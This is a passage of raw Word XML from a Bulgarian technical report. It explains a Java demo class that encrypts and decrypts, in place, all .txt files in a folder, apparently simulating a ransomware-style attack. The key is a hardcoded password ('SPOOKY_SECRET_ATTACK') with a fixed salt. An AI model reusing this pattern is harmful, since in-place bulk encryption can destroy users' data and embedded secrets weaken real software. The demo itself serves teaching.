    </w:p>
    <w:p w14:paraId="00A722C3" w14:textId="77777777" w:rsidR="00803A1A" w:rsidRPr="00803A1A" w:rsidRDefault="00803A1A" w:rsidP="00803A1A">
      <w:pPr>
        <w:pStyle w:val="code"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00803A1A">
        <w:t xml:space="preserve">public static </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00803A1A">
        <w:t>TextEncryptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00803A1A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00803A1A">
        <w:t>text(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00803A1A">
        <w:t>CharSequence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00803A1A">
        <w:t xml:space="preserve"> password, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00803A1A">
        <w:t>CharSequence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00803A1A">
        <w:t xml:space="preserve"> salt) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00803A1A">
        <w:br/>
        <w:t xml:space="preserve">    return new </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00803A1A">
        <w:t>HexEncodingTextEncryptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00803A1A">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00803A1A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>standard</w:t>
      </w:r>
      <w:r w:rsidRPr="00803A1A">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00803A1A">
        <w:t>password, salt));</w:t>
      </w:r>
      <w:r w:rsidRPr="00803A1A">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F3A1B7" w14:textId="39B76FB3" w:rsidR="00803A1A" w:rsidRPr="00803A1A" w:rsidRDefault="00803A1A" w:rsidP="00803A1A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11</w:t>
      </w:r>
      <w:r w:rsidR="00800816">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Метод от класа, ко</w:t>
      </w:r>
      <w:r w:rsidR="007B7F08">
        <w:t>й</w:t>
      </w:r>
      <w:r>
        <w:t>то се използва в демото</w:t>
      </w:r>
      <w:r w:rsidR="007B7F08">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543387A1" w14:textId="4E426A9B" w:rsidR="00055544" w:rsidRPr="00107E62" w:rsidRDefault="00AA4808" w:rsidP="00AA4808">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Използва </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>password-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> криптиране, като се генерира ключ от паролата и солта. Паролата не трябва да бъде споделян</w:t>
      </w:r>
      <w:r w:rsidR="007B7F08">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с нико</w:t>
      </w:r>
      <w:r w:rsidR="00072C9F">
        <w:t>го</w:t>
      </w:r>
      <w:r>
        <w:t>, но в демо</w:t>
      </w:r>
      <w:r w:rsidR="007B7F08">
        <w:t>то</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> е показана за демонстративни цели. Солта е произволна стойност за защита срещу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">rainbow table </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">атаки. </w:t>
      </w:r>
      <w:r w:rsidR="000048DF">
        <w:t>Накрая се к</w:t>
      </w:r>
      <w:r>
        <w:t>риптира текста и</w:t>
      </w:r>
      <w:r w:rsidR="002974F0">
        <w:t xml:space="preserve"> се</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> връща като </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hex </w:t>
      </w:r>
      <w:r>
        <w:t>низ.</w:t>
      </w:r>
      <w:r w:rsidR="00107E62">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:id w:val="667292928"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00107E62">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00107E62">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Spr \l 1033 </w:instrText>
          </w:r>
          <w:r w:rsidR="00107E62">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00823414" w:rsidRPr="00823414">
            <w:rPr>
              <w:noProof/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>[13]</w:t>
          </w:r>
          <w:r w:rsidR="00107E62">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w14:paraId="116542CE" w14:textId="1A7EE936" w:rsidR="00055544" w:rsidRDefault="00055544" w:rsidP="00055544">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Създаден е клас </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TextFileService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00632C8F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">който се използва </w:t>
      </w:r>
      <w:r w:rsidR="00632C8F">
        <w:t xml:space="preserve">за прочитане </w:t>
      </w:r>
      <w:r>
        <w:t>и криптира</w:t>
      </w:r>
      <w:r w:rsidR="00121E99">
        <w:t>не</w:t>
      </w:r>
      <w:r>
        <w:t>/декриптира</w:t>
      </w:r>
      <w:r w:rsidR="00121E99">
        <w:t>не на</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> горепосочените три текстови файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCE0FA2" w14:textId="08C36F33" w:rsidR="00055544" w:rsidRPr="00055544" w:rsidRDefault="00055544" w:rsidP="00055544">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="00055544">
        <w:t>@Slf4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">public class </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>TextFileService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">    private static final String </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">SUFFIX </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:t>= ".txt";</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">    private static final Path </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_FOLDER </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>Path.</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>target_files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>");</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">    private static final String </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">PASSWORD </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:t>= "SPOOKY_SECRET_ATTACK";</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">    private static final String </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">SALT </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:t>= "abcdef1234567890";</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">    private final </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>TextEncryptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve"> encryptor = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>Encryptors.</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>PASSWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SALT</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4021C5DD" w14:textId="4C8DB2DF" w:rsidR="00055544" w:rsidRPr="00055544" w:rsidRDefault="00055544" w:rsidP="00055544">
      <w:pPr>
        <w:pStyle w:val="code"/>
      </w:pPr>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">    public void </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>encryptAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve">() throws </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>IOException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">       for (var file : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>getTxtFiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>()) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">          var content = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>Files.</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>readString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>file.toPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>());</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">          var encrypted = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>encryptor.encrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>(content);</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>Files.</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>writeString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>file.toPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>(), encrypted);</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve">.info("[ENCRYPTED] {}", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>file.getName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>());</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">       }</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">    public void </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>decryptAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve">() throws </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>IOException</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">       for (var file : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>getTxtFiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>()) {</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">          var content = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>Files.</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>readString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>file.toPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>());</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">          var decrypted = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>encryptor.decrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>(content);</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>Files.</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>writeString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>file.toPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>(), decrypted);</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">          </w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve">.info("[DECRYPTED] {}", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>file.getName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>());</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">       }</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">    private List&lt;File&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>getTxtFiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>() {</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">       var files = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>TARGET_FOLDER</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:t>.toFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">       .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>listFiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">             (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve">, name) -&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>name.endsWith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>SUFFIX</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">       );</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">       return files != null ? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>Arrays.</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>asList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve">(files): </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t>List.</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:t>();</w:t>
      </w:r>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00055544">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00055544">
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F1097A" w14:textId="3819D030" w:rsidR="00055544" w:rsidRDefault="00055544" w:rsidP="00C069A1">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Класът използва анотацията </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>@Slf4j</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> за логване. Има четири константи</w:t>
      </w:r>
      <w:r w:rsidR="007B7F08">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> описващи какви са файловете, </w:t>
      </w:r>
      <w:r w:rsidR="00C069A1">
        <w:t xml:space="preserve">директорията им, паролата и солта. Създава се инстанция на </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C069A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TextEncryptor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C069A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C069A1">
        <w:t xml:space="preserve"> Частният метод </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C069A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getTxtFiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B7F08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="007B7F08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B63754">
        <w:t xml:space="preserve">се </w:t>
      </w:r>
      <w:r w:rsidR="007B7F08">
        <w:t>ползва за намирането на</w:t>
      </w:r>
      <w:r w:rsidR="00C069A1">
        <w:t xml:space="preserve"> трите текстови файла в </w:t>
      </w:r>
      <w:r w:rsidR="00C069A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C069A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>target_files</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C069A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00C069A1">
        <w:t xml:space="preserve"> директорията. Методите </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C069A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encryptAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B7F08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00C069A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C069A1">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>decryptAll</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B7F08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="00C069A1">
        <w:t xml:space="preserve"> извикват </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006A1C53">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>getTxtFiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B7F08">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidR="006A1C53">
        <w:t xml:space="preserve"> метода </w:t>
      </w:r>
      <w:r w:rsidR="00C069A1">
        <w:t>и за всеки файл правят прочит, криптират или декриптират като презаписват съдържанието на файловете*.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B73C27D" w14:textId="2F0BCFCF" w:rsidR="00C069A1" w:rsidRPr="00C069A1" w:rsidRDefault="00C069A1" w:rsidP="00C069A1">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C069A1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">*Освен този клас е създаден и </w:t>
      </w:r>
      <w:r w:rsidRPr="00C069A1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>UI</w:t>
      </w:r>
      <w:r w:rsidRPr="00C069A1">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> клас, който </w:t>
      </w:r>
      <w:r w:rsidR="00C442CA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>не е разгледан</w:t>
      </w:r>
      <w:r w:rsidRPr="00C069A1">
        <w:rPr>
          <w:i/>
